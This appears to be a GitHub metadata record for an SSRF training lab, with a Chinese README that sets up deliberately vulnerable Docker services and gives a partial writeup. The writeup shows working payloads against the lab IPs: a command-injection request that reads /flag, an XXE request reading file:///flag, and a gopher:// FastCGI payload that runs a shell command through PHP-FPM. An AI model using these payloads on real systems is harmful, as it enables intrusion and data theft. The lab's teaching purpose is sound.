{"id":26253055,"url":"https://github.com/probiusofficial/ssrf-labs","last_synced_at":"2025-04-24T06:07:04.267Z","repository":{"id":278048896,"uuid":"934322139","full_name":"ProbiusOfficial/ssrf-labs","owner":"ProbiusOfficial","description":"一个ssrf的综合靶场，包含RCE，SQL注入，Tomcat，Redis，MySQL提权等ssrf攻击场景","archived":false,"fork":false,"pushed_at":"2025-03-18T03:25:29.000Z","size":35254,"stargazers_count":54,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-24T06:06:52.768Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ProbiusOfficial.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-17T16:28:50.000Z","updated_at":"2025-04-16T01:02:36.000Z","dependencies_parsed_at":null,"dependency_job_id":"d5003c88-f350-42bd-8a48-5a7c3a5f229e","html_url":"https://github.com/ProbiusOfficial/ssrf-labs","commit_stats":null,"previous_names":["probiusofficial/ssrf-labs"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProbiusOfficial%2Fssrf-labs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProbiusOfficial%2Fssrf-labs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProbiusOfficial%2Fssrf-labs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProbiusOfficial%2Fssrf-labs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ProbiusOfficial","download_url":"https://codeload.github.com/ProbiusOfficial/ssrf-labs/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250573351,"owners_count":21452352,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-03-13T17:29:45.336Z","updated_at":"2025-04-24T06:07:04.261Z","avatar_url":"https://github.com/ProbiusOfficial.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ssrf-labs\n一个ssrf的综合靶场，基于国光师傅的sqlsec/ssrf-vuls，重制了部分关卡，并且添加了完整的dockerfile和dockers-compose。\n\n靶场的设计拓扑图：\n\n![QQ_1742260818430](./assets/QQ_1742260818430.png)\n\n \n\n| 服务名称                                    | 考察攻击方式 | IP地址       |\n| :------------------------------------------ | :----------- | :----------- |\n| CodeExec - 代码执行                         | Gopher-HTTP  | 172.72.23.22 |\n| SQLInject - SQL注入                         | Gopher-HTTP  | 172.72.23.23 |\n| XXE - 外部实体注入                          | Gopher-HTTP  | 172.72.23.24 |\n| Tomcat - put方法任意写文件 (CVE-2017-12615) | Gopher-HTTP  | 172.72.23.25 |\n| CommandExec - 命令执行                      | Gopher-HTTP  | 172.72.23.26 |\n| RedisUnauth - Redis未授权                   | Dict         | 172.72.23.27 |\n| RedisAuth - Redis有授权情况下的组合利用     | Dict         | 172.72.23.28 |\n| MySQLUnauth - Mysql未授权                   | Gopher-TCP   | 172.72.23.29 |\n| FpmUnauth - Fpm未授权(Fastcgi协议)          | Gopher-TCP   | 172.72.23.30 |\n\n\n## Usage\nclone 本项目，然后执行`docker-compose up -d`即可。\n```\ngit clone https://github.com/ProbiusOfficial/ssrf-labs.git\ncd ssrf-labs\ndocker-compose up -d\n```\n访问8080端口即可看到靶场页面。\n\n## Writeup\n对齐国光师傅的靶场 - [手把手带你用 SSRF 打穿内网](https://www.sqlsec.com/2021/05/ssrf.html)，\n\n这里也提供了一份writeup，补充一些东西x\n\n### 172.72.23.21-入口\n\n\n\n### 172.72.23.22-CodeExec\n\n\n\n### 172.72.23.23-SQLI\n\n\n\n### 172.72.23.24-CommandExec\n\n\n\n```\nPOST /ping.php HTTP/1.1\nHost: 172.72.23.24\nContent-Length: 28\nCache-Control: max-age=0\nContent-Type: application/x-www-form-urlencoded\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://core.hello-ctf.com:8011/\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\nConnection: close\n\ntarget=1.1.1.1%3Bcat+%2Fflag\n```\n\n![image-20250220221045642](./assets/image-20250220221045642.png)\n\n### 172.72.23.25-XXE\n\nhttp探测源码后，从其中分析出发包形式（或者本地单独启动一个容器进行抓包构造）：\n\n比如 修改\n\n![image-20250227162255156](./assets/image-20250227162255156.png)\n\n```\nPOST / HTTP/1.1\nHost: 172.72.23.25\nContent-Length: 168\nCache-Control: max-age=0\nOrigin: http://localhost\nContent-Type: application/x-www-form-urlencoded\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://localhost/\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\nsec-ch-ua: \"Not(A:Brand\";v=\"99\", \"Microsoft Edge\";v=\"133\", \"Chromium\";v=\"133\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nsec-fetch-site: none\nsec-fetch-mode: navigate\nsec-fetch-user: ?1\nsec-fetch-dest: document\nConnection: close\n\n\u003c?xml version=\"1.0\" encoding= \"UTF-8\"?\u003e\u003c!DOCTYPE user [\u003c!ENTITY xxe SYSTEM \"file:///flag\" \u003e]\u003e\u003cuser\u003e\t\u003cusername\u003e\u0026xxe;\u003c/username\u003e\t\u003cpassword\u003eadmin\u003c/password\u003e\u003c/user\u003e\n\n```\n\n\n\n\n\n### 172.72.23.26-Tomcat\n\n\n\n### 172.72.23.27-Redisunauth\n\n\n\n### 172.72.23.28-Redisauth\n\n\n\n### 172.72.23.29-MySQL\n\n\n\n### 172.72.23.30-fpm（FastCGI协议）\n\n\u003e  tip:人懒，没注入flag，执行ls命令获得回显就算成功，好吧-v-\n\n[【Fastcgi协议分析 \u0026\u0026 PHP-FPM未授权访问漏洞 \u0026\u0026 Exp编写】](https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html)\n\ntip:在原生环境下（这里指镜像所用的 php:fpm ）目标机器可用的php如下：\n\n```\nroot@hello-ctf:/# find / -name \"*.php\"\n/usr/local/lib/php/pearcmd.php\n/usr/local/lib/php/peclcmd.php\n/usr/local/lib/php/doc/XML_Util/examples/example.php\n/usr/local/lib/php/doc/XML_Util/examples/example2.php\n/usr/local/lib/php/test/XML_Util/tests/Bug5392Tests.php\n/usr/local/lib/php/test/XML_Util/tests/AttributesToStringTests.php\n/usr/local/lib/php/test/XML_Util/tests/SplitQualifiedNameTests.php\n/usr/local/lib/php/test/XML_Util/tests/RaiseErrorTests.php\n/usr/local/lib/php/test/XML_Util/tests/Bug21184Tests.php\n/usr/local/lib/php/test/XML_Util/tests/CollapseEmptyTagsTests.php\n/usr/local/lib/php/test/XML_Util/tests/GetDocTypeDeclarationTests.php\n/usr/local/lib/php/test/XML_Util/tests/IsValidNameTests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateTagFromArrayTests.php\n/usr/local/lib/php/test/XML_Util/tests/Bug4950Tests.php\n/usr/local/lib/php/test/XML_Util/tests/Bug21177Tests.php\n/usr/local/lib/php/test/XML_Util/tests/Bug18343Tests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateEndElementTests.php\n/usr/local/lib/php/test/XML_Util/tests/GetXmlDeclarationTests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateTagTests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateStartElementTests.php\n/usr/local/lib/php/test/XML_Util/tests/ReverseEntitiesTests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateCDataSectionTests.php\n/usr/local/lib/php/test/XML_Util/tests/ReplaceEntitiesTests.php\n/usr/local/lib/php/test/XML_Util/tests/AbstractUnitTests.php\n/usr/local/lib/php/test/XML_Util/tests/ApiVersionTests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateCommentTests.php\n/usr/local/lib/php/test/Structures_Graph/tests/BasicGraphTest.php\n/usr/local/lib/php/test/Structures_Graph/tests/TopologicalSorterTest.php\n/usr/local/lib/php/test/Structures_Graph/tests/AcyclicTestTest.php\n/usr/local/lib/php/Structures/Graph.php\n/usr/local/lib/php/Structures/Graph/Manipulator/AcyclicTest.php\n/usr/local/lib/php/Structures/Graph/Manipulator/TopologicalSorter.php\n/usr/local/lib/php/Structures/Graph/Node.php\n/usr/local/lib/php/System.php\n/usr/local/lib/php/OS/Guess.php\n/usr/local/lib/php/PEAR/Task/Windowseol/rw.php\n/usr/local/lib/php/PEAR/Task/Postinstallscript/rw.php\n/usr/local/lib/php/PEAR/Task/Common.php\n/usr/local/lib/php/PEAR/Task/Replace.php\n/usr/local/lib/php/PEAR/Task/Unixeol.php\n/usr/local/lib/php/PEAR/Task/Unixeol/rw.php\n/usr/local/lib/php/PEAR/Task/Replace/rw.php\n/usr/local/lib/php/PEAR/Task/Postinstallscript.php\n/usr/local/lib/php/PEAR/Task/Windowseol.php\n/usr/local/lib/php/PEAR/Config.php\n/usr/local/lib/php/PEAR/ChannelFile.php\n/usr/local/lib/php/PEAR/Exception.php\n/usr/local/lib/php/PEAR/Common.php\n/usr/local/lib/php/PEAR/REST/10.php\n/usr/local/lib/php/PEAR/REST/11.php\n/usr/local/lib/php/PEAR/REST/13.php\n/usr/local/lib/php/PEAR/Installer.php\n/usr/local/lib/php/PEAR/Command/Config.php\n/usr/local/lib/php/PEAR/Command/Common.php\n/usr/local/lib/php/PEAR/Command/Pickle.php\n/usr/local/lib/php/PEAR/Command/Build.php\n/usr/local/lib/php/PEAR/Command/Package.php\n/usr/local/lib/php/PEAR/Command/Mirror.php\n/usr/local/lib/php/PEAR/Command/Install.php\n/usr/local/lib/php/PEAR/Command/Auth.php\n/usr/local/lib/php/PEAR/Command/Remote.php\n/usr/local/lib/php/PEAR/Command/Channels.php\n/usr/local/lib/php/PEAR/Command/Registry.php\n/usr/local/lib/php/PEAR/Command/Test.php\n/usr/local/lib/php/PEAR/ErrorStack.php\n/usr/local/lib/php/PEAR/Proxy.php\n/usr/local/lib/php/PEAR/Frontend.php\n/usr/local/lib/php/PEAR/PackageFile/v2/rw.php\n/usr/local/lib/php/PEAR/PackageFile/v2/Validator.php\n/usr/local/lib/php/PEAR/PackageFile/v2.php\n/usr/local/lib/php/PEAR/PackageFile/Parser/v2.php\n/usr/local/lib/php/PEAR/PackageFile/Parser/v1.php\n/usr/local/lib/php/PEAR/PackageFile/v1.php\n/usr/local/lib/php/PEAR/PackageFile/Generator/v2.php\n/usr/local/lib/php/PEAR/PackageFile/Generator/v1.php\n/usr/local/lib/php/PEAR/Command.php\n/usr/local/lib/php/PEAR/Frontend/CLI.php\n/usr/local/lib/php/PEAR/Downloader.php\n/usr/local/lib/php/PEAR/RunTest.php\n/usr/local/lib/php/PEAR/Downloader/Package.php\n/usr/local/lib/php/PEAR/ChannelFile/Parser.php\n/usr/local/lib/php/PEAR/REST.php\n/usr/local/lib/php/PEAR/PackageFile.php\n/usr/local/lib/php/PEAR/Packager.php\n/usr/local/lib/php/PEAR/Builder.php\n/usr/local/lib/php/PEAR/Validator/PECL.php\n/usr/local/lib/php/PEAR/DependencyDB.php\n/usr/local/lib/php/PEAR/Validate.php\n/usr/local/lib/php/PEAR/Dependency2.php\n/usr/local/lib/php/PEAR/Installer/Role.php\n/usr/local/lib/php/PEAR/Installer/Role/Www.php\n/usr/local/lib/php/PEAR/Installer/Role/Cfg.php\n/usr/local/lib/php/PEAR/Installer/Role/Doc.php\n/usr/local/lib/php/PEAR/Installer/Role/Common.php\n/usr/local/lib/php/PEAR/Installer/Role/Data.php\n/usr/local/lib/php/PEAR/Installer/Role/Ext.php\n/usr/local/lib/php/PEAR/Installer/Role/Php.php\n/usr/local/lib/php/PEAR/Installer/Role/Src.php\n/usr/local/lib/php/PEAR/Installer/Role/Test.php\n/usr/local/lib/php/PEAR/Installer/Role/Man.php\n/usr/local/lib/php/PEAR/Installer/Role/Script.php\n/usr/local/lib/php/PEAR/XMLParser.php\n/usr/local/lib/php/PEAR/Registry.php\n/usr/local/lib/php/build/run-tests.php\n/usr/local/lib/php/build/gen_stub.php\n/usr/local/lib/php/Console/Getopt.php\n/usr/local/lib/php/XML/Util.php\n/usr/local/lib/php/Archive/Tar.php\n/usr/local/lib/php/PEAR.php\n```\n\n本题可使用工具[【Esonhugh-Gopherus3】](https://github.com/Esonhugh/Gopherus3)：\n\n```\nPS C:\\Users\\admin\u003e gopherus3 --exploit fastcgi --host 172.72.23.30\n       ________              .__                                ________\n     /  _____/  ____ ______ |  |__   ___________ __ __  ______ \\_____  \\\n    /   \\  ___ /  _ \\\\____ \\|  |  \\_/ __ \\_  __ \\  |  \\/  ___/   _(__  \u003c\n    \\    \\_\\  (  \u003c_\u003e )  |_\u003e \u003e   Y  \\  ___/|  | \\/  |  /\\___ \\   /       \\\n     \\______  /\\____/|   __/|___|  /\\___  \u003e__|  |____//____  \u003e /______  /\n            \\/       |__|        \\/     \\/                 \\/         \\/\n\n\nGive one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one:  /usr/local/lib/php/pearcmd.php\nTerminal command to run:  ls /\n\nYour gopher link is ready to do SSRF:\n\ngopher://172.72.23.30:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0B%03%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH56%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%1ESCRIPT_FILENAME/usr/local/lib/php/pearcmd.php%0D%01DOCUMENT_ROOT/%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%008%04%00%3C%3Fphp%20system%28%27ls%20/%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00\n```\n\n\n\n## 鸣谢\n\n- [国光师傅：手把手带你用 SSRF 打穿内网](https://www.sqlsec.com/2021/05/ssrf.html)\n- [Github：sqlsec/ssrf-vuls](https://github.com/sqlsec/ssrf-vuls)\n- [Github：tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)\n- [Github：LS95/gopher-redis-auth](https://github.com/LS95/gopher-redis-auth)\n\n## 开源许可证\n\n- 本项目基于无许可证的原始仓库：https://github.com/sqlsec/ssrf-vuls\n- 所有新增/修改的代码采用 MIT 许可证（详见 LICENSE 文件）\n- 使用者需自行承担使用无许可证代码的风险\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprobiusofficial%2Fssrf-labs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprobiusofficial%2Fssrf-labs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprobiusofficial%2Fssrf-labs/lists"}